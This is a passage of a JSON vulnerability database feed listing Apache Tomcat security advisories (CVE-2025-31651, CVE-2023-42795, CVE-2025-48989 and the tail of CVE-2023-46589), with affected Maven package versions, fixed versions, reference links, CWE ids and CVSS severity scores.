"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/11/GHSA-fccv-jmmp-qg76/GHSA-fccv-jmmp-qg76.json" } }, { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "8.5.0" }, { "fixed": "8.5.96" } ] } ], "versions": [ "8.5.0", "8.5.11", "8.5.12", "8.5.13", "8.5.14", "8.5.15", "8.5.16", "8.5.19", "8.5.2", "8.5.20", "8.5.21", "8.5.23", "8.5.24", "8.5.27", "8.5.28", "8.5.29", "8.5.3", "8.5.30", "8.5.31", "8.5.32", "8.5.33", "8.5.34", "8.5.35", "8.5.37", "8.5.38", "8.5.39", "8.5.4", "8.5.40", "8.5.41", "8.5.42", "8.5.43", "8.5.45", "8.5.46", "8.5.47", "8.5.49", "8.5.5", "8.5.50", "8.5.51", "8.5.53", "8.5.54", "8.5.55", "8.5.56", "8.5.57", "8.5.58", "8.5.59", "8.5.6", "8.5.60", "8.5.61", "8.5.63", "8.5.64", "8.5.65", "8.5.66", "8.5.68", "8.5.69", "8.5.70", "8.5.71", "8.5.72", "8.5.73", "8.5.75", "8.5.76", "8.5.77", "8.5.78", "8.5.79", "8.5.8", "8.5.81", "8.5.82", "8.5.83", "8.5.84", "8.5.85", "8.5.86", "8.5.87", "8.5.88", "8.5.89", "8.5.9", 
"8.5.90", "8.5.91", "8.5.92", "8.5.93", "8.5.94", "8.5.95" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/11/GHSA-fccv-jmmp-qg76/GHSA-fccv-jmmp-qg76.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-46589" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/6f181e1062a472bc5f0234980f66cbde42c1041b" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/7a2d8818fcea0b51747a67af9510ce7977245ebd" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/aa92971e879a519384c517febc39fd04c48d4642" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/b5776d769bffeade865061bc8ecbeb2b56167b08" }, { "type": "PACKAGE", "url": "https://github.com/apache/tomcat" }, { "type": "WEB", "url": "https://lists.apache.org/thread/0rqq6ktozqc42ro8hhxdmmdjm1k1tpxr" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2024/01/msg00001.html" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20231214-0009" }, { "type": "WEB", "url": "https://tomcat.apache.org/security-10.html" }, { "type": "WEB", "url": "https://tomcat.apache.org/security-11.html" }, { "type": "WEB", "url": "https://tomcat.apache.org/security-8.html" }, { "type": "WEB", "url": "https://tomcat.apache.org/security-9.html" }, { "type": "WEB", "url": "https://www.openwall.com/lists/oss-security/2023/11/28/2" }, { "type": "WEB", "url": "http://www.openwall.com/lists/oss-security/2023/11/28/2" } ], "database_specific": { "cwe_ids": [ "CWE-20", "CWE-444" ], "github_reviewed": true, "github_reviewed_at": "2023-11-28T23:28:54Z", "nvd_published_at": "2023-11-28T16:15:06Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-ff77-26x5-69cr", "published": "2025-04-28T21:30:43Z", "modified": 
"2025-11-03T23:15:57.588860Z", "aliases": [ "BIT-tomcat-2025-31651", "CVE-2025-31651" ], "related": [ "CGA-576p-jvpw-wc6p", "CGA-mm2j-x7m9-9wg3" ], "summary": "Apache Tomcat Rewrite rule bypass", "details": "Improper Neutralization of Escape, Meta, or Control Sequences vulnerability in Apache Tomcat. For a subset of unlikely rewrite rule configurations, it was possible for a specially crafted request to bypass some rewrite rules. If those rewrite rules effectively enforced security constraints, those constraints could be bypassed.\n\nThis issue affects Apache Tomcat: from 11.0.0-M1 through 11.0.5, from 10.1.0-M1 through 10.1.39, from 9.0.0.M1 through 9.0.102. The following versions were EOL at the time the CVE was created but are known to be affected: 8.5.0 though 8.5.100. Other, older, EOL versions may also be affected.\n\nUsers are recommended to upgrade to version 9.0.104, 10.1.40 or 11.0.6, which fix the issue.", "affected": [ { "package": { "name": "org.apache.tomcat:tomcat-catalina", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat/tomcat-catalina" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "9.0.76" }, { "fixed": "9.0.104" } ] } ], "versions": [ "9.0.100", "9.0.102", "9.0.76", "9.0.78", "9.0.79", "9.0.80", "9.0.81", "9.0.82", "9.0.83", "9.0.84", "9.0.85", "9.0.86", "9.0.87", "9.0.88", "9.0.89", "9.0.90", "9.0.91", "9.0.93", "9.0.94", "9.0.95", "9.0.96", "9.0.97", "9.0.98", "9.0.99" ], "database_specific": { "last_known_affected_version_range": "\u003c= 9.0.102", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/04/GHSA-ff77-26x5-69cr/GHSA-ff77-26x5-69cr.json" } }, { "package": { "name": "org.apache.tomcat:tomcat-catalina", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat/tomcat-catalina" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "10.1.10" }, { "fixed": "10.1.40" } ] } ], "versions": [ "10.1.10", "10.1.11", "10.1.12", "10.1.13", "10.1.14", 
"10.1.15", "10.1.16", "10.1.17", "10.1.18", "10.1.19", "10.1.20", "10.1.23", "10.1.24", "10.1.25", "10.1.26", "10.1.28", "10.1.29", "10.1.30", "10.1.31", "10.1.33", "10.1.34", "10.1.35", "10.1.36", "10.1.39" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/04/GHSA-ff77-26x5-69cr/GHSA-ff77-26x5-69cr.json" } }, { "package": { "name": "org.apache.tomcat:tomcat-catalina", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat/tomcat-catalina" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "11.0.0-M2" }, { "fixed": "11.0.6" } ] } ], "versions": [ "11.0.0", "11.0.0-M10", "11.0.0-M11", "11.0.0-M12", "11.0.0-M13", "11.0.0-M14", "11.0.0-M15", "11.0.0-M16", "11.0.0-M17", "11.0.0-M18", "11.0.0-M19", "11.0.0-M20", "11.0.0-M21", "11.0.0-M22", "11.0.0-M24", "11.0.0-M25", "11.0.0-M26", "11.0.0-M3", "11.0.0-M4", "11.0.0-M5", "11.0.0-M6", "11.0.0-M7", "11.0.0-M9", "11.0.1", "11.0.2", "11.0.3", "11.0.4", "11.0.5" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/04/GHSA-ff77-26x5-69cr/GHSA-ff77-26x5-69cr.json" } }, { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "9.0.76" }, { "fixed": "9.0.104" } ] } ], "versions": [ "9.0.100", "9.0.102", "9.0.76", "9.0.78", "9.0.79", "9.0.80", "9.0.81", "9.0.82", "9.0.83", "9.0.84", "9.0.85", "9.0.86", "9.0.87", "9.0.88", "9.0.89", "9.0.90", "9.0.91", "9.0.93", "9.0.94", "9.0.95", "9.0.96", "9.0.97", "9.0.98", "9.0.99" ], "database_specific": { "last_known_affected_version_range": "\u003c= 9.0.102", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/04/GHSA-ff77-26x5-69cr/GHSA-ff77-26x5-69cr.json" } }, { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", 
"ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "10.1.10" }, { "fixed": "10.1.40" } ] } ], "versions": [ "10.1.10", "10.1.11", "10.1.12", "10.1.13", "10.1.14", "10.1.15", "10.1.16", "10.1.17", "10.1.18", "10.1.19", "10.1.20", "10.1.23", "10.1.24", "10.1.25", "10.1.26", "10.1.28", "10.1.29", "10.1.30", "10.1.31", "10.1.33", "10.1.34", "10.1.35", "10.1.36", "10.1.39" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/04/GHSA-ff77-26x5-69cr/GHSA-ff77-26x5-69cr.json" } }, { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "11.0.0-M2" }, { "fixed": "11.0.6" } ] } ], "versions": [ "11.0.0", "11.0.0-M10", "11.0.0-M11", "11.0.0-M12", "11.0.0-M13", "11.0.0-M14", "11.0.0-M15", "11.0.0-M16", "11.0.0-M17", "11.0.0-M18", "11.0.0-M19", "11.0.0-M20", "11.0.0-M21", "11.0.0-M22", "11.0.0-M24", "11.0.0-M25", "11.0.0-M26", "11.0.0-M3", "11.0.0-M4", "11.0.0-M5", "11.0.0-M6", "11.0.0-M7", "11.0.0-M9", "11.0.1", "11.0.2", "11.0.3", "11.0.4", "11.0.5" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/04/GHSA-ff77-26x5-69cr/GHSA-ff77-26x5-69cr.json" } }, { "package": { "name": "org.apache.tomcat:tomcat-catalina", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat/tomcat-catalina" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "8.5.0" }, { "last_affected": "8.5.100" } ] } ], "versions": [ "8.5.0", "8.5.100", "8.5.11", "8.5.12", "8.5.13", "8.5.14", "8.5.15", "8.5.16", "8.5.19", "8.5.2", "8.5.20", "8.5.21", "8.5.23", "8.5.24", "8.5.27", "8.5.28", "8.5.29", "8.5.3", "8.5.30", "8.5.31", "8.5.32", "8.5.33", "8.5.34", "8.5.35", "8.5.37", "8.5.38", "8.5.39", 
"8.5.4", "8.5.40", "8.5.41", "8.5.42", "8.5.43", "8.5.45", "8.5.46", "8.5.47", "8.5.49", "8.5.5", "8.5.50", "8.5.51", "8.5.53", "8.5.54", "8.5.55", "8.5.56", "8.5.57", "8.5.58", "8.5.59", "8.5.6", "8.5.60", "8.5.61", "8.5.63", "8.5.64", "8.5.65", "8.5.66", "8.5.68", "8.5.69", "8.5.70", "8.5.71", "8.5.72", "8.5.73", "8.5.75", "8.5.76", "8.5.77", "8.5.78", "8.5.79", "8.5.8", "8.5.81", "8.5.82", "8.5.83", "8.5.84", "8.5.85", "8.5.86", "8.5.87", "8.5.88", "8.5.89", "8.5.9", "8.5.90", "8.5.91", "8.5.92", "8.5.93", "8.5.94", "8.5.95", "8.5.96", "8.5.97", "8.5.98", "8.5.99" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/04/GHSA-ff77-26x5-69cr/GHSA-ff77-26x5-69cr.json" } }, { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "8.5.0" }, { "last_affected": "8.5.100" } ] } ], "versions": [ "8.5.0", "8.5.100", "8.5.11", "8.5.12", "8.5.13", "8.5.14", "8.5.15", "8.5.16", "8.5.19", "8.5.2", "8.5.20", "8.5.21", "8.5.23", "8.5.24", "8.5.27", "8.5.28", "8.5.29", "8.5.3", "8.5.30", "8.5.31", "8.5.32", "8.5.33", "8.5.34", "8.5.35", "8.5.37", "8.5.38", "8.5.39", "8.5.4", "8.5.40", "8.5.41", "8.5.42", "8.5.43", "8.5.45", "8.5.46", "8.5.47", "8.5.49", "8.5.5", "8.5.50", "8.5.51", "8.5.53", "8.5.54", "8.5.55", "8.5.56", "8.5.57", "8.5.58", "8.5.59", "8.5.6", "8.5.60", "8.5.61", "8.5.63", "8.5.64", "8.5.65", "8.5.66", "8.5.68", "8.5.69", "8.5.70", "8.5.71", "8.5.72", "8.5.73", "8.5.75", "8.5.76", "8.5.77", "8.5.78", "8.5.79", "8.5.8", "8.5.81", "8.5.82", "8.5.83", "8.5.84", "8.5.85", "8.5.86", "8.5.87", "8.5.88", "8.5.89", "8.5.9", "8.5.90", "8.5.91", "8.5.92", "8.5.93", "8.5.94", "8.5.95", "8.5.96", "8.5.97", "8.5.98", "8.5.99" ], "database_specific": { "source": 
"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/04/GHSA-ff77-26x5-69cr/GHSA-ff77-26x5-69cr.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-31651" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/066bf6b6a15a4e7e0941d4acf096841165b97098" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/175dc75fc428930034a6c93fb52f830d955d8e64" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/ee3ab548e92345eca0cbd1f01649eb36c6f29454" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/fbecc915a10c5a3d634c5e2c6ced4ff479ce9953" }, { "type": "PACKAGE", "url": "https://github.com/apache/tomcat" }, { "type": "WEB", "url": "https://lists.apache.org/list.html?announce@tomcat.apache.org" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2025/07/msg00009.html" }, { "type": "WEB", "url": "https://tomcat.apache.org/security-10.html" }, { "type": "WEB", "url": "https://tomcat.apache.org/security-11.html" }, { "type": "WEB", "url": "https://tomcat.apache.org/security-9.html" }, { "type": "WEB", "url": "http://www.openwall.com/lists/oss-security/2025/04/28/3" } ], "database_specific": { "cwe_ids": [ "CWE-116", "CWE-150" ], "github_reviewed": true, "github_reviewed_at": "2025-04-29T15:03:25Z", "nvd_published_at": "2025-04-28T20:15:20Z", "severity": "LOW" }, "severity": [ { "type": "CVSS_V4", "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:U" } ] }, { "schema_version": "1.7.3", "id": "GHSA-g8pj-r55q-5c2v", "published": "2023-10-10T18:31:35Z", "modified": "2025-08-08T19:07:14.800663Z", "aliases": [ "BIT-tomcat-2023-42795", "CVE-2023-42795" ], "summary": "Apache Tomcat Incomplete Cleanup vulnerability", "details": "Incomplete Cleanup vulnerability in Apache Tomcat.\n\nWhen recycling various internal objects in Apache Tomcat from 11.0.0-M1 through 11.0.0-M11, from 10.1.0-M1 through 10.1.13, 
from 9.0.0-M1 through 9.0.80 and from 8.5.0 through 8.5.93, an error could cause Tomcat to skip some parts of the recycling process leading to information leaking from the current request/response to the next. Older, EOL versions may also be affected.\n\nUsers are recommended to upgrade to version 11.0.0-M12 onwards, 10.1.14 onwards, 9.0.81 onwards or 8.5.94 onwards, which fixes the issue.", "affected": [ { "package": { "name": "org.apache.tomcat:tomcat-coyote", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat/tomcat-coyote" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "11.0.0-M1" }, { "fixed": "11.0.0-M12" } ] } ], "versions": [ "11.0.0-M1", "11.0.0-M10", "11.0.0-M11", "11.0.0-M3", "11.0.0-M4", "11.0.0-M5", "11.0.0-M6", "11.0.0-M7", "11.0.0-M9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/10/GHSA-g8pj-r55q-5c2v/GHSA-g8pj-r55q-5c2v.json" } }, { "package": { "name": "org.apache.tomcat:tomcat-coyote", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat/tomcat-coyote" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "10.1.0-M1" }, { "fixed": "10.1.14" } ] } ], "versions": [ "10.1.0", "10.1.0-M1", "10.1.0-M10", "10.1.0-M11", "10.1.0-M12", "10.1.0-M14", "10.1.0-M15", "10.1.0-M16", "10.1.0-M17", "10.1.0-M2", "10.1.0-M4", "10.1.0-M5", "10.1.0-M6", "10.1.0-M7", "10.1.0-M8", "10.1.1", "10.1.10", "10.1.11", "10.1.12", "10.1.13", "10.1.2", "10.1.4", "10.1.5", "10.1.6", "10.1.7", "10.1.8", "10.1.9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/10/GHSA-g8pj-r55q-5c2v/GHSA-g8pj-r55q-5c2v.json" } }, { "package": { "name": "org.apache.tomcat:tomcat", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat/tomcat" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "9.0.0-M1" }, { "fixed": "9.0.81" } ] } ], "versions": [ "9.0.0.M1", "9.0.0.M10", "9.0.0.M11", 
"9.0.0.M13", "9.0.0.M15", "9.0.0.M17", "9.0.0.M18", "9.0.0.M19", "9.0.0.M20", "9.0.0.M21", "9.0.0.M22", "9.0.0.M25", "9.0.0.M26", "9.0.0.M27", "9.0.0.M3", "9.0.0.M4", "9.0.0.M6", "9.0.0.M8", "9.0.0.M9", "9.0.1", "9.0.10", "9.0.11", "9.0.12", "9.0.13", "9.0.14", "9.0.16", "9.0.17", "9.0.19", "9.0.2", "9.0.20", "9.0.21", "9.0.22", "9.0.24", "9.0.26", "9.0.27", "9.0.29", "9.0.30", "9.0.31", "9.0.33", "9.0.34", "9.0.35", "9.0.36", "9.0.37", "9.0.38", "9.0.39", "9.0.4", "9.0.40", "9.0.41", "9.0.43", "9.0.44", "9.0.45", "9.0.46", "9.0.48", "9.0.5", "9.0.50", "9.0.52", "9.0.53", "9.0.54", "9.0.55", "9.0.56", "9.0.58", "9.0.59", "9.0.6", "9.0.60", "9.0.62", "9.0.63", "9.0.64", "9.0.65", "9.0.67", "9.0.68", "9.0.69", "9.0.7", "9.0.70", "9.0.71", "9.0.72", "9.0.73", "9.0.74", "9.0.75", "9.0.76", "9.0.78", "9.0.79", "9.0.8", "9.0.80" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/10/GHSA-g8pj-r55q-5c2v/GHSA-g8pj-r55q-5c2v.json" } }, { "package": { "name": "org.apache.tomcat:tomcat", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat/tomcat" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "8.5.0" }, { "fixed": "8.5.94" } ] } ], "versions": [ "8.5.0", "8.5.11", "8.5.12", "8.5.13", "8.5.14", "8.5.15", "8.5.16", "8.5.19", "8.5.2", "8.5.20", "8.5.21", "8.5.23", "8.5.24", "8.5.27", "8.5.28", "8.5.29", "8.5.3", "8.5.30", "8.5.31", "8.5.32", "8.5.33", "8.5.34", "8.5.35", "8.5.37", "8.5.38", "8.5.39", "8.5.4", "8.5.40", "8.5.41", "8.5.42", "8.5.43", "8.5.45", "8.5.46", "8.5.47", "8.5.49", "8.5.5", "8.5.50", "8.5.51", "8.5.53", "8.5.54", "8.5.55", "8.5.56", "8.5.57", "8.5.58", "8.5.59", "8.5.6", "8.5.60", "8.5.61", "8.5.63", "8.5.64", "8.5.65", "8.5.66", "8.5.68", "8.5.69", "8.5.70", "8.5.71", "8.5.72", "8.5.73", "8.5.75", "8.5.76", "8.5.77", "8.5.78", "8.5.79", "8.5.8", "8.5.81", "8.5.82", "8.5.83", "8.5.84", "8.5.85", "8.5.86", "8.5.87", "8.5.88", "8.5.89", "8.5.9", "8.5.90", 
"8.5.91", "8.5.92", "8.5.93" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/10/GHSA-g8pj-r55q-5c2v/GHSA-g8pj-r55q-5c2v.json" } }, { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "11.0.0-M1" }, { "fixed": "11.0.0-M12" } ] } ], "versions": [ "11.0.0-M1", "11.0.0-M10", "11.0.0-M11", "11.0.0-M3", "11.0.0-M4", "11.0.0-M5", "11.0.0-M6", "11.0.0-M7", "11.0.0-M9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/10/GHSA-g8pj-r55q-5c2v/GHSA-g8pj-r55q-5c2v.json" } }, { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "10.1.0-M1" }, { "fixed": "10.1.14" } ] } ], "versions": [ "10.1.0", "10.1.0-M1", "10.1.0-M10", "10.1.0-M11", "10.1.0-M12", "10.1.0-M14", "10.1.0-M15", "10.1.0-M16", "10.1.0-M17", "10.1.0-M2", "10.1.0-M4", "10.1.0-M5", "10.1.0-M6", "10.1.0-M7", "10.1.0-M8", "10.1.1", "10.1.10", "10.1.11", "10.1.12", "10.1.13", "10.1.2", "10.1.4", "10.1.5", "10.1.6", "10.1.7", "10.1.8", "10.1.9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/10/GHSA-g8pj-r55q-5c2v/GHSA-g8pj-r55q-5c2v.json" } }, { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "9.0.0-M1" }, { "fixed": "9.0.81" } ] } ], "versions": [ "9.0.0.M1", "9.0.0.M10", "9.0.0.M11", "9.0.0.M13", "9.0.0.M15", "9.0.0.M17", "9.0.0.M18", "9.0.0.M19", "9.0.0.M20", "9.0.0.M21", "9.0.0.M22", "9.0.0.M25", "9.0.0.M26", 
"9.0.0.M27", "9.0.0.M3", "9.0.0.M4", "9.0.0.M6", "9.0.0.M8", "9.0.0.M9", "9.0.1", "9.0.10", "9.0.11", "9.0.12", "9.0.13", "9.0.14", "9.0.16", "9.0.17", "9.0.19", "9.0.2", "9.0.20", "9.0.21", "9.0.22", "9.0.24", "9.0.26", "9.0.27", "9.0.29", "9.0.30", "9.0.31", "9.0.33", "9.0.34", "9.0.35", "9.0.36", "9.0.37", "9.0.38", "9.0.39", "9.0.4", "9.0.40", "9.0.41", "9.0.43", "9.0.44", "9.0.45", "9.0.46", "9.0.48", "9.0.5", "9.0.50", "9.0.52", "9.0.53", "9.0.54", "9.0.55", "9.0.56", "9.0.58", "9.0.59", "9.0.6", "9.0.60", "9.0.62", "9.0.63", "9.0.64", "9.0.65", "9.0.67", "9.0.68", "9.0.69", "9.0.7", "9.0.70", "9.0.71", "9.0.72", "9.0.73", "9.0.74", "9.0.75", "9.0.76", "9.0.78", "9.0.79", "9.0.8", "9.0.80" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/10/GHSA-g8pj-r55q-5c2v/GHSA-g8pj-r55q-5c2v.json" } }, { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "8.5.0" }, { "fixed": "8.5.94" } ] } ], "versions": [ "8.5.0", "8.5.11", "8.5.12", "8.5.13", "8.5.14", "8.5.15", "8.5.16", "8.5.19", "8.5.2", "8.5.20", "8.5.21", "8.5.23", "8.5.24", "8.5.27", "8.5.28", "8.5.29", "8.5.3", "8.5.30", "8.5.31", "8.5.32", "8.5.33", "8.5.34", "8.5.35", "8.5.37", "8.5.38", "8.5.39", "8.5.4", "8.5.40", "8.5.41", "8.5.42", "8.5.43", "8.5.45", "8.5.46", "8.5.47", "8.5.49", "8.5.5", "8.5.50", "8.5.51", "8.5.53", "8.5.54", "8.5.55", "8.5.56", "8.5.57", "8.5.58", "8.5.59", "8.5.6", "8.5.60", "8.5.61", "8.5.63", "8.5.64", "8.5.65", "8.5.66", "8.5.68", "8.5.69", "8.5.70", "8.5.71", "8.5.72", "8.5.73", "8.5.75", "8.5.76", "8.5.77", "8.5.78", "8.5.79", "8.5.8", "8.5.81", "8.5.82", "8.5.83", "8.5.84", "8.5.85", "8.5.86", "8.5.87", "8.5.88", "8.5.89", "8.5.9", "8.5.90", "8.5.91", "8.5.92", "8.5.93" ], "database_specific": { "source": 
"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/10/GHSA-g8pj-r55q-5c2v/GHSA-g8pj-r55q-5c2v.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-42795" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/30f8063d7a9b4c43ae4722f5e382a76af1d7a6bf" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/44d05d75d696ca10ce251e4e370511e38f20ae75" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/9375d67106f8df9eb9d7b360b2bef052fe67d3d4" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/d6db22e411307c97ddf78315c15d5889356eca38" }, { "type": "PACKAGE", "url": "https://github.com/apache/tomcat" }, { "type": "WEB", "url": "https://lists.apache.org/thread/065jfyo583490r9j2v73nhpyxdob56lw" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2023/10/msg00020.html" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20231103-0007" }, { "type": "WEB", "url": "https://www.debian.org/security/2023/dsa-5521" }, { "type": "WEB", "url": "https://www.debian.org/security/2023/dsa-5522" }, { "type": "WEB", "url": "http://www.openwall.com/lists/oss-security/2023/10/10/9" } ], "database_specific": { "cwe_ids": [ "CWE-459" ], "github_reviewed": true, "github_reviewed_at": "2023-10-10T22:30:05Z", "nvd_published_at": "2023-10-10T18:15:18Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-gqp3-2cvr-x8m3", "published": "2025-08-13T15:30:34Z", "modified": "2025-11-05T21:04:59.959358Z", "aliases": [ "BIT-tomcat-2025-48989", "CVE-2025-48989" ], "summary": "Apache Tomcat Improper Resource Shutdown or Release vulnerability", "details": "Improper Resource Shutdown or Release vulnerability in Apache Tomcat made Tomcat vulnerable to the made you reset attack.\n\nThis issue affects Apache Tomcat: from 
11.0.0-M1 through 11.0.9, from 10.1.0-M1 through 10.1.43 and from 9.0.0.M1 through 9.0.107. Older, EOL versions may also be affected.\n\nUsers are recommended to upgrade to one of versions 11.0.10, 10.1.44 or 9.0.108 which fix the issue.", "affected": [ { "package": { "name": "org.apache.tomcat:tomcat-coyote", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat/tomcat-coyote" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "11.0.0-M1" }, { "fixed": "11.0.10" } ] } ], "versions": [ "11.0.0", "11.0.0-M1", "11.0.0-M10", "11.0.0-M11", "11.0.0-M12", "11.0.0-M13", "11.0.0-M14", "11.0.0-M15", "11.0.0-M16", "11.0.0-M17", "11.0.0-M18", "11.0.0-M19", "11.0.0-M20", "11.0.0-M21", "11.0.0-M22", "11.0.0-M24", "11.0.0-M25", "11.0.0-M26", "11.0.0-M3", "11.0.0-M4", "11.0.0-M5", "11.0.0-M6", "11.0.0-M7", "11.0.0-M9", "11.0.1", "11.0.2", "11.0.3", "11.0.4", "11.0.5", "11.0.6", "11.0.7", "11.0.8", "11.0.9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/08/GHSA-gqp3-2cvr-x8m3/GHSA-gqp3-2cvr-x8m3.json" } }, { "package": { "name": "org.apache.tomcat:tomcat-coyote", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat/tomcat-coyote" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "10.1.0-M1" }, { "fixed": "10.1.44" } ] } ], "versions": [ "10.1.0", "10.1.0-M1", "10.1.0-M10", "10.1.0-M11", "10.1.0-M12", "10.1.0-M14", "10.1.0-M15", "10.1.0-M16", "10.1.0-M17", "10.1.0-M2", "10.1.0-M4", "10.1.0-M5", "10.1.0-M6", "10.1.0-M7", "10.1.0-M8", "10.1.1", "10.1.10", "10.1.11", "10.1.12", "10.1.13", "10.1.14", "10.1.15", "10.1.16", "10.1.17", "10.1.18", "10.1.19", "10.1.2", "10.1.20", "10.1.23", "10.1.24", "10.1.25", "10.1.26", "10.1.28", "10.1.29", "10.1.30", "10.1.31", "10.1.33", "10.1.34", "10.1.35", "10.1.36", "10.1.39", "10.1.4", "10.1.40", "10.1.41", "10.1.42", "10.1.43", "10.1.5", "10.1.6", "10.1.7", "10.1.8", "10.1.9" ], "database_specific": { "source": 
